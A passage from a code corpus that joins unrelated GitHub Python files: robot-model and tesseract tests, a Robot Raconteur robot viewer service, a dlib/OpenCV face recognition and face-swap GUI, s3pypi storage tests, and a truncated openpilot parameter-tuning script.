left_robot = urdf.robot_from_xml_file("test/sda10f_nogeom.urdf", "rpi_general_robotics_toolbox_py", tip_link='arm_left_link_tool0')
_assert_left_robot(left_robot)
right_robot = urdf.robot_from_xml_file("test/sda10f_nogeom.urdf", "rpi_general_robotics_toolbox_py", root_link='torso_link_b1', tip_link='arm_right_link_tool0')
_assert_right_robot(right_robot)
def _assert_left_robot(robot):
np.testing.assert_allclose(robot.H, np.array([[0.,0.,0.,0.,0.,0.,0.,0.],[0.,1.,0.,1.,0.,-1.,0.,1.],[1.,0,-1.,0.,1.,0.,1.,0.]]), atol=1e-4)
np.testing.assert_allclose(robot.P, np.array([[0.0926,0.0999,0.,0.,0.,0.,0.,0.,0.],[0.,0.0275,0.2255,0.169,0.181,0.1936,0.155,0.168,0.],[0.8835,0.3221,0.0577,-0.0454,-0.0085,0.0155,0.008,-0.015,0.]]), atol=1e-4)
np.testing.assert_allclose(robot.joint_type, np.array([0.,0.,0.,0.,0.,0.,0.,0.]), atol=1e-4)
np.testing.assert_allclose(robot.joint_lower_limit, np.array([-2.957,-3.13,-1.9,-2.95,-2.36,-3.13,-1.9,-3.13]), atol=1e-4)
np.testing.assert_allclose(robot.joint_upper_limit, np.array([2.957,3.13,1.9,2.95,2.36,3.13,1.9,3.13]), atol=1e-4)
np.testing.assert_allclose(robot.joint_vel_limit, np.array([2.26,2.95,2.95,2.95,2.95,3.48,3.48,6.97]), atol=1e-4)
np.testing.assert_allclose(robot.R_tool, np.array([[-1,0,0],[0,0,-1],[0,-1,0]]), atol=1e-4)
np.testing.assert_allclose(robot.p_tool, np.zeros((3,)), atol=1e-4)
def _assert_right_robot(robot):
np.testing.assert_allclose(robot.H, np.array([[0.,0.,0.,0.,0.,0.,0.],[1.,0.,1.,0.,-1.,0.,1.],[0.,1.,0.,-1.,0.,-1.,0.]]), atol=1e-4)
np.testing.assert_allclose(robot.P, np.array([[0.1,0.,0.,0.,0.,0.,0.,0.],[-0.0275,-0.2255,-0.169,-0.181,-0.1936,-0.155,-0.168,0.],[0.3221,0.0577,-0.0454,-0.0085,0.0155,0.008,-0.015,0.]]), atol=1e-4)
np.testing.assert_allclose(robot.joint_type, np.array([0.,0.,0.,0.,0.,0.,0.]), atol=1e-4)
np.testing.assert_allclose(robot.joint_lower_limit, np.array([-3.13,-1.9,-2.95,-2.36,-3.13,-1.9,-3.13]), atol=1e-4)
np.testing.assert_allclose(robot.joint_upper_limit, np.array([3.13,1.9,2.95,2.36,3.13,1.9,3.13]), atol=1e-4)
np.testing.assert_allclose(robot.joint_vel_limit, np.array([2.95,2.95,2.95,2.95,3.48,3.48,6.97]), atol=1e-4)
np.testing.assert_allclose(robot.R_tool, np.array([[1,0,0],[0,0,1],[0,-1,0]]), atol=1e-4)
np.testing.assert_allclose(robot.p_tool, np.zeros((3,)), atol=1e-4)
``` |
{
"source": "johnwason/tesseract_python-1",
"score": 3
} |
#### File: tests/tesseract_common/test_tesseract_common.py
```python
from tesseract import tesseract_common
def test_status_code():
# Test that status codes can be created
status_code = tesseract_common.StatusCode(100, tesseract_common.GeneralStatusCategory())
print(status_code)
def test_bytes_resource():
my_bytes = bytearray([10,57,92,56,92,46,92,127])
my_bytes_url = "file:///test_bytes.bin"
bytes_resource = tesseract_common.BytesResource(my_bytes_url,my_bytes)
my_bytes_ret = bytes_resource.getResourceContents()
assert(len(my_bytes_ret) == len(my_bytes))
assert(my_bytes == bytearray(my_bytes_ret))
assert(my_bytes_url == bytes_resource.getUrl())
```
#### File: tests/tesseract_environment/test_tesseract_environment.py
```python
from tesseract import tesseract_scene_graph
from tesseract import tesseract_collision
from tesseract import tesseract_environment
from tesseract.tesseract_common import Isometry3d, Translation3d, AngleAxisd
from tesseract import tesseract_common
from tesseract import tesseract_collision
from tesseract import tesseract_collision_bullet
from tesseract import tesseract_urdf
import os
import re
import traceback
def _locate_resource(url):
try:
url_match = re.match(r"^package:\/\/tesseract_support\/(.*)$",url)
if (url_match is None):
return ""
if not "TESSERACT_SUPPORT_DIR" in os.environ:
return ""
tesseract_support = os.environ["TESSERACT_SUPPORT_DIR"]
return os.path.join(tesseract_support, os.path.normpath(url_match.group(1)))
    except:
        traceback.print_exc()
        return ""
def get_scene_graph():
tesseract_support = os.environ["TESSERACT_SUPPORT_DIR"]
path = os.path.join(tesseract_support, "urdf/lbr_iiwa_14_r820.urdf")
locator_fn = tesseract_scene_graph.SimpleResourceLocatorFn(_locate_resource)
locator = tesseract_scene_graph.SimpleResourceLocator(locator_fn)
return tesseract_urdf.parseURDFFile(path, locator)
def get_srdf_model(scene_graph):
tesseract_support = os.environ["TESSERACT_SUPPORT_DIR"]
path = os.path.join(tesseract_support, "urdf/lbr_iiwa_14_r820.srdf")
srdf = tesseract_scene_graph.SRDFModel()
srdf.initFile(scene_graph, path)
return srdf
def get_environment():
scene_graph = get_scene_graph()
assert scene_graph is not None
srdf = get_srdf_model(scene_graph)
assert srdf is not None
env = tesseract_environment.Environment()
assert env is not None
assert env.getRevision() == 0
success = env.init(scene_graph,srdf)
assert success
assert env.getRevision() == 2
# env.init() now populates contact managers?
"""discrete_create_fn = tesseract_collision.DiscreteContactManagerFactoryCreateMethod(tesseract_collision_bullet.BulletDiscreteBVHManager.create)
assert env.registerDiscreteContactManager(tesseract_collision_bullet.BulletDiscreteBVHManager.name(),
discrete_create_fn)
cont_create_fn = tesseract_collision.ContinuousContactManagerFactoryCreateMethod(tesseract_collision_bullet.BulletCastBVHManager.create)
assert env.registerContinuousContactManager(tesseract_collision_bullet.BulletCastBVHManager.name(),
cont_create_fn)
env.setActiveDiscreteContactManager(tesseract_collision_bullet.BulletDiscreteBVHManager.name())
env.setActiveContinuousContactManager(tesseract_collision_bullet.BulletCastBVHManager.name())"""
return env
def test_env():
get_environment()
``` |
{
"source": "johnwason/tesseract_viewer_python_robotraconteur",
"score": 2
} |
#### File: johnwason/tesseract_viewer_python_robotraconteur/tesseract_viewer_python_service.py
```python
import RobotRaconteur as RR
RRN = RR.RobotRaconteurNode.s
import RobotRaconteurCompanion as RRC
from tesseract.tesseract_common import FilesystemPath, Isometry3d, Translation3d, Quaterniond, \
ManipulatorInfo
from tesseract.tesseract_environment import Environment
from tesseract.tesseract_scene_graph import SimpleResourceLocator, SimpleResourceLocatorFn
from tesseract.tesseract_command_language import StateWaypoint, Waypoint, MoveInstruction, \
Instruction, CompositeInstruction, MoveInstructionType_FREESPACE
import os
import re
import traceback
from tesseract_viewer import TesseractViewer
import numpy as np
import time
import sys
import argparse
from typing import List
import threading
_robdef = """
service experimental.tesseract_viewer
import com.robotraconteur.robotics.trajectory
using com.robotraconteur.robotics.trajectory.JointTrajectory
object TesseractViewer
property string{list} joint_names [readonly]
function void update_joint_positions(string{list} joint_names, double[] joint_positions)
function void update_trajectory(JointTrajectory trajectory)
end
"""
def main():
parser = argparse.ArgumentParser(description="Tesseract Viewer Standalone Robot Raconteur Service")
parser.add_argument("--urdf-file", type=argparse.FileType('r'),default=None,required=True,help="URDF file for scene (required)")
parser.add_argument("--srdf-file", type=argparse.FileType('r'),default=None,required=True,help="SRDF file for scene (required)")
    parser.add_argument("--manipulator-name", type=str, default="manipulator",help="Name of manipulator in SRDF file (default \"manipulator\")")
parser.add_argument("--z-offset",type=float,default=0.0,help="Z-offset for scene (default 0.0)")
parser.add_argument("--http-port",type=int,default=8000,help="HTTP TCP/IP Listen Port (default 8000)")
args, _ = parser.parse_known_args()
with args.urdf_file:
urdf_file_text = args.urdf_file.read()
with args.srdf_file:
srdf_file_text = args.srdf_file.read()
t_env = Environment()
# locator_fn must be kept alive by maintaining a reference
locator = GazeboModelResourceLocator()
t_env.init(urdf_file_text, srdf_file_text, locator)
manip_info = ManipulatorInfo()
manip_info.manipulator = args.manipulator_name
viewer = TesseractViewer(server_address=('',args.http_port))
viewer.update_environment(t_env, [0,0,args.z_offset])
# TODO: thread lock for updates?
viewer.start_serve_background()
joint_names = list(t_env.getActiveJointNames())
obj=TesseractViewerService(viewer,joint_names)
RRC.RegisterStdRobDefServiceTypes(RRN)
RRN.RegisterServiceType(_robdef)
with RR.ServerNodeSetup("experimental.tesseract_viewer",59712,argv=sys.argv):
RRN.RegisterService("tesseract_viewer","experimental.tesseract_viewer.TesseractViewer",obj)
        if sys.version_info[0] < 3:
            raw_input("press enter")
        else:
            input("press enter")
class TesseractViewerService:
def __init__(self, viewer : TesseractViewer, joint_names: List[str]):
self._viewer = viewer
self.joint_names = joint_names
self._lock = threading.Lock()
def update_joint_positions(self, joint_names : List[str], joint_positions : np.array):
with self._lock:
assert len(joint_positions) == len(joint_names), "joint_names and joint_positions must have same length"
for j in joint_names:
assert j in self.joint_names, f"Invalid joint name: {j}"
self._viewer.update_joint_positions(joint_names, joint_positions)
def update_trajectory(self, trajectory):
#TODO: more error checking
joint_names = trajectory.joint_names
for j in joint_names:
assert j in self.joint_names, f"Invalid joint name: {j}"
traj2 = CompositeInstruction("DEFAULT")
for wp in trajectory.waypoints:
assert len(wp.joint_position) == len(joint_names), "Invalid joint position vector len"
wp2 = StateWaypoint(joint_names, wp.joint_position)
wp2.time = wp.time_from_start
move_instr = MoveInstruction(Waypoint(wp2), MoveInstructionType_FREESPACE)
traj2.append(Instruction(move_instr))
self._viewer.update_trajectory(traj2)
class GazeboModelResourceLocatorFn:
def __init__(self):
model_env_path = os.environ["GAZEBO_MODEL_PATH"]
self.model_paths = model_env_path.split(os.pathsep)
assert len(self.model_paths) != 0, "No GAZEBO_MODEL_PATH specified!"
for p in self.model_paths:
assert os.path.isdir(p), "GAZEBO_MODEL_PATH directory does not exist: %s" % p
def __call__(self,url):
try:
url_match = re.match(r"^model:\/\/(\w+)\/(.+)$",url)
if (url_match is None):
assert False, "Invalid Gazebo model resource url %s" % url
model_name = url_match.group(1)
resource_path = os.path.normpath(url_match.group(2))
for p in self.model_paths:
fname = os.path.join(p, model_name, resource_path )
if not os.path.isfile(fname):
continue
return fname
assert False, "Could not find requested resource %s" % url
except:
traceback.print_exc()
return ""
def GazeboModelResourceLocator():
locator_fn = SimpleResourceLocatorFn(GazeboModelResourceLocatorFn())
locator = SimpleResourceLocator(locator_fn)
locator_fn.__disown__()
return locator
if __name__ == "__main__":
main()
``` |
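A client can then connect over Robot Raconteur and call the two functions declared in the `_robdef` above. The following is a minimal sketch, assuming the default TCP transport on the port 59712 passed to `ServerNodeSetup`; the joint values are illustrative only.
```python
# Sketch only: connection URL and joint values are illustrative assumptions.
from RobotRaconteur.Client import *     # provides the RRN client node
import numpy as np

c = RRN.ConnectService("rr+tcp://localhost:59712?service=tesseract_viewer")
names = list(c.joint_names)                              # read-only property from the robdef
c.update_joint_positions(names, np.zeros(len(names)))    # send all joints to zero
```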
{
"source": "JohnWatson96/Image-Processing-Face-Recognition",
"score": 3
} |
#### File: JohnWatson96/Image-Processing-Face-Recognition/face_functions.py
```python
import cv2
import dlib
import numpy as np
from scipy.spatial import Delaunay
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor("../dlib-models/shape_predictor_68_face_landmarks.dat")
recogniser = dlib.face_recognition_model_v1("../dlib-models/dlib_face_recognition_resnet_model_v1.dat")
def match(src_descriptor, descriptors):
distances = np.linalg.norm(descriptors - src_descriptor, axis=1)
if True in list(distances <= 0.6):
return np.argmin(distances)
else:
return None
def recognise(img, shape):
descriptor = np.array(recogniser.compute_face_descriptor(img, shape))
return descriptor
def swap(src_img, src_points, src_bbox, input_img, input_points):
if src_points is None or src_bbox is None: # no face detected
print("No face to swap")
return src_img
result_img = warp(src_img, src_points, src_bbox, input_img, input_points)
"""src_img = draw(src_img)
for point in input_points:
cv2.circle(input_img, (point[0], point[1]), 2, (0, 255, 0), -1)
bbox = find(input_img)[1]
cv2.line(input_img, tuple(bbox[0]), tuple(bbox[1]), (0, 0, 255), 2)
cv2.line(input_img, tuple(bbox[0]), tuple(bbox[2]), (0, 0, 255), 2)
cv2.line(input_img, tuple(bbox[2]), tuple(bbox[3]), (0, 0, 255), 2)
cv2.line(input_img, tuple(bbox[1]), tuple(bbox[3]), (0, 0, 255), 2)
cv2.imshow("John", src_img)
cv2.imshow("Andrew", input_img)
cv2.waitKey(0) # Demonstration"""
## Mask for blending
h, w = src_img.shape[:2]
mask = mask_from_points((h, w), src_points)
#cv2.imshow("mask", mask)
mask_src = np.mean(result_img, axis=2) > 0
mask = np.asarray(mask * mask_src, dtype=np.uint8)
#cv2.imshow("mask1", mask)
# colour correction
#Apply Masks
result_img = cv2.bitwise_and(result_img, result_img, mask=mask)
#cv2.imshow("result_img", result_img)
dst_face_masked = cv2.bitwise_and(src_img, src_img, mask=mask)
#cv2.imshow("dst_face_masked", dst_face_masked)
result_img = correct_colours(dst_face_masked, result_img, src_points)
#cv2.imshow("result_img2", result_img)
## Shrink the mask
kernel = np.ones((10, 10), np.uint8)
mask = cv2.erode(mask, kernel, iterations=1)
#cv2.imshow("mask3", mask)
##Poisson Blending
r = cv2.boundingRect(mask)
center = ((r[0] + int(r[2] / 2), r[1] + int(r[3] / 2)))
result_img = cv2.seamlessClone(result_img, src_img, mask, center, cv2.NORMAL_CLONE)
#cv2.imshow("result_img3", result_img)
#cv2.waitKey(0)
return result_img
def correct_colours(im1, im2, landmarks1):
COLOUR_CORRECT_BLUR_FRAC = 0.75 #Blending amount
LEFT_EYE_POINTS = list(range(42, 48))
RIGHT_EYE_POINTS = list(range(36, 42))
    #determine kernel size
blur_amount = COLOUR_CORRECT_BLUR_FRAC * np.linalg.norm(np.mean(landmarks1[LEFT_EYE_POINTS], axis=0) - np.mean(landmarks1[RIGHT_EYE_POINTS], axis=0))
blur_amount = int(blur_amount)
    #Ensure kernel size value is not even
if blur_amount % 2 == 0:
blur_amount += 1
# Apply blur
    im1_blur = cv2.medianBlur(im1, blur_amount)
    im2_blur = cv2.medianBlur(im2, blur_amount)
# Avoid divide-by-zero errors.
im2_blur = im2_blur.astype(int)
im2_blur = im2_blur + 128*(im2_blur <= 1)
#Blend images
result = np.float64(im2) * np.float64(im1_blur) / np.float64(im2_blur)
#Remove overflown pixel values
result = np.uint8(np.clip(result, 0, 255))
return result
def mask_from_points(size, points):
#Create kernel array
kernel = np.ones((10, 10), np.uint8)
#Create mask of zeroes
mask = np.zeros(size, np.uint8)
cv2.fillConvexPoly(mask, cv2.convexHull(points), 255)
mask = cv2.erode(mask, kernel, iterations=1)
return mask
def find(img):
detections = detector(img) # detect faces and store rectangles
if len(detections) == 0:
print("No face detected")
return None, None, None
shape = predictor(img, detections[0]) # find the shape of the face (use first detected face)
points = np.array(list([point.x, point.y] for point in shape.parts()))
points = find_pupils(img, points)
bbox = [[min(points[:, 0]), min(points[:, 1])], [max(points[:, 0]), min(points[:, 1])],
[min(points[:, 0]), max(points[:, 1])], [max(points[:, 0]), max(points[:, 1])]]
'''
0 1
2 3
'''
return points, bbox, shape
def find_pupils(img, points):
left_bbox = [[min(points[36:41, 0]), min(points[36:41, 1])], [max(points[36:41, 0]), min(points[36:41, 1])],
[min(points[36:41, 0]), max(points[36:41, 1])], [max(points[36:41, 0]), max(points[36:41, 1])]]
right_bbox = [[min(points[42:47, 0]), min(points[42:47, 1])], [max(points[42:47, 0]), min(points[42:47, 1])],
[min(points[42:47, 0]), max(points[42:47, 1])], [max(points[42:47, 0]), max(points[42:47, 1])]]
# find bounding box for eyes
bboxs = [left_bbox, right_bbox]
for bbox in bboxs:
eye = img[bbox[0][1]:bbox[3][1], bbox[0][0]:bbox[3][0]] # crop image to each eye
#cv2.imshow("eye", eye)
eye = cv2.cvtColor(eye, cv2.COLOR_BGR2GRAY) # convert to single channel
#cv2.imshow("eye1", eye)
#eye = cv2.inRange(eye, (0, 0, 0), (50, 50, 50))
eye = cv2.GaussianBlur(eye, (3, 3), 0)
#cv2.imshow("eye2", eye)
eye = cv2.erode(eye, (3, 3), iterations=3)
#cv2.imshow("eye3", eye)
ret, _ = cv2.threshold(eye, 0, 255, cv2.THRESH_OTSU)
_, eye = cv2.threshold(eye, ret*0.7, 255, cv2.THRESH_BINARY_INV)
#cv2.imshow("eye4", eye)
#cv2.waitKey(0)
try:
m = cv2.moments(eye)
x = int(m["m10"] / m["m00"])
y = int(m["m01"] / m["m00"])
eye = cv2.cvtColor(eye, cv2.COLOR_GRAY2BGR)
cv2.circle(eye, (x, y), 1, (0, 0, 255), -1)
#cv2.imshow("eye", eye)
#cv2.waitKey(0)
points = np.vstack((points, [bbox[0][0] + x, bbox[0][1] + y])) # absolute coordinates
except (IndexError, ZeroDivisionError):
points = np.vstack((points, [int((bbox[0][0] + bbox[3][0]) / 2), int((bbox[0][1] + bbox[3][1]) / 2)]))
"""contours, _ = cv2.findContours(eye, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
contours = sorted(contours, key=cv2.contourArea)
try:
m = cv2.moments(contours[-2])
x = int(m["m10"] / m["m00"])
y = int(m["m01"] / m["m00"])
eye = cv2.cvtColor(eye, cv2.COLOR_GRAY2BGR)
cv2.circle(eye, (x, y), 1, (0, 0, 255), -1)
cv2.drawContours(eye, contours[-2], -1, (255, 0, 0), 1)
cv2.imshow("eye", eye)
cv2.waitKey(0)
points = np.vstack((points, [bbox[0][0] + x, bbox[0][1] + y])) # absolute coordinates
except (IndexError, ZeroDivisionError):
points = np.vstack((points, [int((bbox[0][0] + bbox[3][0])/2), int((bbox[0][1] + bbox[3][1])/2)]))"""
"""iris = cv2.HoughCircles(eye, cv2.HOUGH_GRADIENT, 1, 100,
param1=20,
param2=10,
minRadius=5,
maxRadius=20)
if iris is not None:
iris = np.uint16(np.around(iris))
eye = cv2.cvtColor(eye, cv2.COLOR_GRAY2BGR)
cv2.circle(eye, (iris[0][0][0], iris[0][0][1]), iris[0][0][2], (0, 255, 0), 1)
cv2.circle(eye, (iris[0][0][0], iris[0][0][1]), 1, (0, 0, 255), -1)
cv2.imshow("eye", eye)
cv2.waitKey(0)
points = np.vstack((points, [bbox[0][0] + iris[0][0][0], bbox[0][1] + iris[0][0][1]])) #add eye centerpoint
else:
points = np.vstack((points, [int((bbox[0][0] + bbox[3][0])/2), int((bbox[0][1] + bbox[3][1])/2)]))
#add center of bbox"""
return points
def warp(src_img, src_points, src_bbox, input_img, input_points):
result_img = np.zeros(src_img.shape, dtype=src_img.dtype)
#result_img = src_img.copy()
src_delaunay = Delaunay(src_points) # create Delaunay triangles to warp to
triangle_affines = np.array(list(get_affine_transform(src_delaunay.simplices, input_points, src_points)))
# create transform matrices to warp input points to source triangles
src_bbox_points = np.array([(x, y) for x in range(src_bbox[0][0], src_bbox[3][0] + 1)
for y in range(src_bbox[0][1], src_bbox[3][1] + 1)])
# create an array of all coordinates in source face area
src_indicies = src_delaunay.find_simplex(src_bbox_points) # returns triangle index for each point, -1 for none
"""lefteye_points = src_points[36:41]
lefteye_Delaunay = Delaunay(lefteye_points)
lefteye_indicies = lefteye_Delaunay.find_simplex(src_bbox_points)
righteye_points = src_points[42:47]
righteye_Delaunay = Delaunay(righteye_points)
righteye_indicies = righteye_Delaunay.find_simplex(src_bbox_points)"""
mouth_points = src_points[60:67]
mouth_Delaunay = Delaunay(mouth_points)
mouth_indicies = mouth_Delaunay.find_simplex(src_bbox_points)
for index in range(len(src_indicies)):
if (mouth_indicies[index] != -1): # (lefteye_indicies[index] != -1) or (righteye_indicies[index] != -1) or
src_indicies[index] = -1
for triangle_index in range(len(src_delaunay.simplices)): # for each triangle
triangle_points = src_bbox_points[src_indicies == triangle_index] # for the points in the triangle
num_points = len(triangle_points) # get the number of points
out_points = np.dot(triangle_affines[triangle_index], np.vstack((triangle_points.T, np.ones(num_points))))
# perform affine transform T = M.[x,y,1]^T to create triangle of input in the source
x, y = triangle_points.T # transpose [[x1,y1], [x2,y2], ...] to [x1, x2, ...], [y1, y2, ...] src_triangle coord
warp_img = cv2.warpAffine(input_img, triangle_affines[triangle_index], (input_img.shape[1], input_img.shape[0]))
#cv2.imshow("warp_img", warp_img)
result_img[y, x] = warp_img[y, x]
#cv2.imshow("result_img", result_img)
#cv2.waitKey(20) # these show the process for each section
return result_img
def get_affine_transform(input_simplices, input_points, src_points):
for triangle in input_simplices: # for each triangle
src_triangle = np.float32(src_points[triangle])
input_triangle = np.float32(input_points[triangle])
mat = cv2.getAffineTransform(input_triangle, src_triangle) # get the transform matrix
#mat = cv2.getAffineTransform(src_triangle, input_triangle) # get the transform matrix
yield mat
def draw(img): # draws facial points, Delaunay triangles and bounding box
points, bbox, _ = find(img)
if points is None or bbox is None:
print("no face to draw")
return img
left_bbox = [[min(points[36:41, 0]), min(points[36:41, 1])], [max(points[36:41, 0]), min(points[36:41, 1])],
[min(points[36:41, 0]), max(points[36:41, 1])], [max(points[36:41, 0]), max(points[36:41, 1])]]
right_bbox = [[min(points[42:47, 0]), min(points[42:47, 1])], [max(points[42:47, 0]), min(points[42:47, 1])],
[min(points[42:47, 0]), max(points[42:47, 1])], [max(points[42:47, 0]), max(points[42:47, 1])]]
bboxs = [bbox, left_bbox, right_bbox]
for bbox in bboxs:
cv2.line(img, tuple(bbox[0]), tuple(bbox[1]), (0, 0, 255), 2)
cv2.line(img, tuple(bbox[0]), tuple(bbox[2]), (0, 0, 255), 2)
cv2.line(img, tuple(bbox[2]), tuple(bbox[3]), (0, 0, 255), 2)
cv2.line(img, tuple(bbox[1]), tuple(bbox[3]), (0, 0, 255), 2)
for point in points:
cv2.circle(img, (point[0], point[1]), 2, (0, 255, 0), -1)
triangles = Delaunay(points)
for triangle in points[triangles.simplices]:
cv2.line(img, tuple(triangle[0]), tuple(triangle[1]), (255, 255, 255), 1)
cv2.line(img, tuple(triangle[1]), tuple(triangle[2]), (255, 255, 255), 1)
cv2.line(img, tuple(triangle[2]), tuple(triangle[0]), (255, 255, 255), 1)
return img
```
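A minimal sketch of how these helpers chain together for a single swap; the image file names below are placeholders, not files from the repository.
```python
# Sketch only: image paths are placeholders.
import cv2
import face_functions as face

src_img = cv2.imread("scene.jpg")          # image whose face will be replaced
input_img = cv2.imread("replacement.jpg")  # image providing the new face

src_points, src_bbox, _ = face.find(src_img)
input_points, _, _ = face.find(input_img)

result = face.swap(src_img, src_points, src_bbox, input_img, input_points)
cv2.imshow("swapped", result)
cv2.waitKey(0)
```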
#### File: JohnWatson96/Image-Processing-Face-Recognition/gui_functions.py
```python
import cv2
import numpy as np
import face_functions as face
from PyQt5.QtWidgets import (QApplication, QMainWindow, QPushButton, QWidget, QInputDialog, QLineEdit, QGridLayout,
QLabel)
from PyQt5.QtGui import QPixmap, QImage
from PyQt5.QtCore import Qt, pyqtSignal, QThread, pyqtSlot
import glob
#globals
recognise = False
swap = None
save = False
cam = 0
# initialisation
input_imgs = []
input_names = []
for file in glob.glob("*.jpg"):
input_imgs.append(cv2.imread(file))
input_names.append(file[:-4])
input_pointses = np.zeros((len(input_imgs), 70, 2), dtype=np.uint32)
input_bboxs = np.zeros((len(input_imgs), 4, 2), dtype=np.uint32)
input_shapes = []
input_descriptors = []
#input_points, input_bbox, input_shape = face.find(input_imgs[3]) # testing
for index in range(0, len(input_imgs)):
input_points, input_bbox, input_shape = face.find(input_imgs[index])
input_pointses[index] = input_points
input_bboxs[index] = input_bbox
input_shapes.append(input_shape)
input_descriptors.append(face.recognise(input_imgs[index], input_shape))
#cv2.imshow("swap", face.swap(input_imgs[3], input_pointses[3], input_bboxs[3], input_imgs[0], input_pointses[0]))
def closecam():
global cam
cam.release()
return
def frame_operation(frame):
global recognise
global swap
global save
if save:
cv2.imwrite(file, frame)
save = False
if recognise:
_, frame_bbox, frame_shape = face.find(frame)
        if frame_bbox is not None and frame_shape is not None:
frame_descriptor = face.recognise(frame, frame_shape)
name_index = face.match(frame_descriptor, input_descriptors)
if name_index is not None:
name = input_names[name_index]
frame = face.draw(frame)
cv2.putText(frame, name, tuple(frame_bbox[2]), cv2.FONT_HERSHEY_DUPLEX, 2.0, (255, 0, 0), 2)
else:
frame = face.draw(frame)
cv2.putText(frame, "Not Recognised", (0, 480), cv2.FONT_HERSHEY_DUPLEX, 2.0, (255, 0, 0), 2)
else:
cv2.putText(frame, "No Face Detected", (0, 480), cv2.FONT_HERSHEY_DUPLEX, 2.0, (255, 0, 0), 2)
if swap is not None:
frame_points, frame_bbox, _ = face.find(frame)
frame = face.swap(frame, frame_points, frame_bbox, input_imgs[swap], input_pointses[swap])
return frame
class Thread(QThread):
changePixmapIn = pyqtSignal(QImage, name='In')
changePixmapOut = pyqtSignal(QImage, name='Out')
def run(self):
global cam
cam = cv2.VideoCapture(0)
while True:
ret, frame = cam.read()
if ret:
rgbImage = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
h, w, ch = rgbImage.shape
bytesPerLine = ch * w
convertToQtFormat = QImage(rgbImage.data, w, h, bytesPerLine, QImage.Format_RGB888)
p = convertToQtFormat.scaled(640, 480, Qt.KeepAspectRatio)
self.changePixmapIn.emit(p)
frame = frame_operation(frame)
if ret:
rgbImage = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
h, w, ch = rgbImage.shape
bytesPerLine = ch * w
convertToQtFormat = QImage(rgbImage.data, w, h, bytesPerLine, QImage.Format_RGB888)
p = convertToQtFormat.scaled(640, 480, Qt.KeepAspectRatio)
self.changePixmapOut.emit(p)
# -----------Video Capture--------------------#
# GUI
class AppWindow(QMainWindow):
def getText(self):
global file
text, okPressed = QInputDialog.getText(self, "Get text", "Your name:", QLineEdit.Normal, "")
if okPressed and text != '':
global save
save = True
file = text + ".jpg"
# Define Button Presses
def Button1_pressed(self):
global recognise
        recognise = not recognise
def Button2_pressed(self):
global swap
if swap is None:
swap = 0
elif swap < len(input_imgs) - 1:
swap = swap + 1
else:
swap = None
if swap is not None:
self.Name.setText(input_names[swap])
else:
self.Name.setText("")
def Button3_pressed(self):
self.getText()
# Initilize main window
def __init__(self, *args, **kwargs):
super(AppWindow, self).__init__(*args, **kwargs)
# Set Title and window dimensions
self.setWindowTitle("Facial Recognition Project")
# -----------Buttons-------------------------#
# Create buttons
self.Button1 = QPushButton()
self.Button2 = QPushButton()
self.Button3 = QPushButton()
self.Name = QLabel()
# Label Buttons
self.Button1.setText('Who am I?')
self.Button2.setText('Swap my face!')
self.Button3.setText('Remember me!')
# Place buttons
self.layout = QGridLayout()
self.layout.addWidget(self.Button1, 3, 3)
self.layout.addWidget(self.Button2, 4, 3)
self.layout.addWidget(self.Button3, 5, 3)
self.layout.addWidget(self.Name, 3, 5)
# Connect buttons
self.Button1.clicked.connect(self.Button1_pressed)
self.Button2.clicked.connect(self.Button2_pressed)
self.Button3.clicked.connect(self.Button3_pressed)
# -----------Images-------------------------#
self.labelIn = QLabel(self)
self.pixmapIn = QPixmap()
self.resize(self.pixmapIn.width(), self.pixmapIn.height())
self.layout.addWidget(self.labelIn, 0, 0, 2, 2)
self.labelOut = QLabel(self)
self.pixmapOut = QPixmap()
self.resize(self.pixmapOut.width(), self.pixmapOut.height())
self.layout.addWidget(self.labelOut, 0, 4, 2, 6)
# Lay widgets location
self.widget = QWidget()
self.widget.setLayout(self.layout)
self.setCentralWidget(self.widget)
th = Thread(self)
th.changePixmapIn.connect(self.setImageIn)
th.changePixmapOut.connect(self.setImageOut)
th.start()
# Image Update
@pyqtSlot(QImage, name='In')
def setImageIn(self, image):
# Input image
self.labelIn.setPixmap(QPixmap.fromImage(image))
@pyqtSlot(QImage, name='Out')
def setImageOut(self, frame):
# Output image
self.labelOut.setPixmap(QPixmap.fromImage(frame))
``` |
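The module only defines the window and capture thread and has no entry point of its own. A launcher along these lines (a sketch, not part of the original file) would start the GUI and release the webcam on exit.
```python
# Sketch only: a typical PyQt5 entry point for the AppWindow defined above.
import sys
from PyQt5.QtWidgets import QApplication
import gui_functions

if __name__ == "__main__":
    app = QApplication(sys.argv)
    window = gui_functions.AppWindow()
    window.show()
    code = app.exec_()
    gui_functions.closecam()   # release the webcam opened by the worker thread
    sys.exit(code)
```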
{
"source": "johnwatsonncr/s3pypi",
"score": 2
} |
#### File: tests/unit/test_storage.py
```python
from s3pypi.package import Package
from s3pypi.storage import S3Storage
def test_secret_in_s3_key(secret):
storage = S3Storage("appstrakt-pypi", secret)
package = Package("test-0.1.0", [])
assert secret in storage._object(package, "index.html").key
assert storage.acl == "public-read"
def test_private_s3_key(private):
storage = S3Storage("appstrakt-pypi", private=private)
assert storage.acl == "private"
``` |
{
"source": "johnwaynehacker/openpilotsubaru",
"score": 3
} |
#### File: openpilotsubaru/selfdrive/rtt_cl_interface.py
```python
import pickle
import sys
def isDigit(x):
try:
float(x)
return True
except (ValueError, TypeError) as e:
return False
rt_tuning_file = '/data/.openpilot_rtt_params.pkl'
# Loop forever (ctrl-C and then Enter key to end script)
while 1:
with open(rt_tuning_file, "rb") as f_read:
rtt_params = pickle.load(f_read)
key_list = []
print('')
cnt = 0
for key in sorted(rtt_params.keys()):
print('{0}: {1}'.format(cnt, key))
key_list.append(key)
cnt += 1
print('')
sys.stdin = open('/dev/tty')
entry = raw_input('Enter parameter number to modify: ')
# Data checking
try:
int(entry)
except ValueError:
print ('Please re-enter a valid parameter number.')
continue
param_num = int(entry)
if param_num < 0 or param_num >= len(key_list):
print('Please re-enter a valid parameter number.')
continue
print('')
print('Old value:')
key = key_list[param_num]
original_param_is_list = False
if isDigit(rtt_params[key]):
print(' {0}: {1:.6f}'.format(key, rtt_params[key]))
else:
print(' {0}: {1}'.format(key, rtt_params[key]))
original_param_is_list = True
print('')
entry = raw_input('Enter new value: ')
print('')
#print(entry)
# Check to see if a list was entered... basically anything with a comma.
if ',' in entry or ('[' in entry and ']' in entry):
if not original_param_is_list:
print('Original value was float, new value entered is a list. Try again.')
print('')
continue
entry = entry.replace('[','').replace(']','')
processed_entry = [float(s) for s in entry.split(',') if isDigit(s)]
